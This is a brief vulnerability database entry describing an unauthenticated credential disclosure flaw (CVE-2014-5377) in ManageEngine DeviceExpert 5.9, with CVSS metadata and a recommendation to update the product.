vendor: DeviceExpert
by: Pedro Ribeiro
CVSS: 7.5 (HIGH)
User credential disclosure
CWE: 200
Product Name: DeviceExpert
Affected Version From: 5.9
Affected Version To: 5.9 build 5980
Patch Exists: YES
Related CWE: CVE-2014-5377
CPE: a:manageengine:deviceexpert:5.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014
User credential disclosure in ManageEngine DeviceExpert 5.9
DeviceExpert is a web-based, multi-vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. A vulnerability was discovered in the product that allows user credentials to be disclosed without authentication or any other prior information. The disclosed passwords are salted MD5 hashes. Affected versions are UNFIXED as of 27/08/2014: the current version, 5.9 build 5980, is vulnerable, and older versions are likely vulnerable.
Mitigation:
Update to the latest version of the product to fix the vulnerability.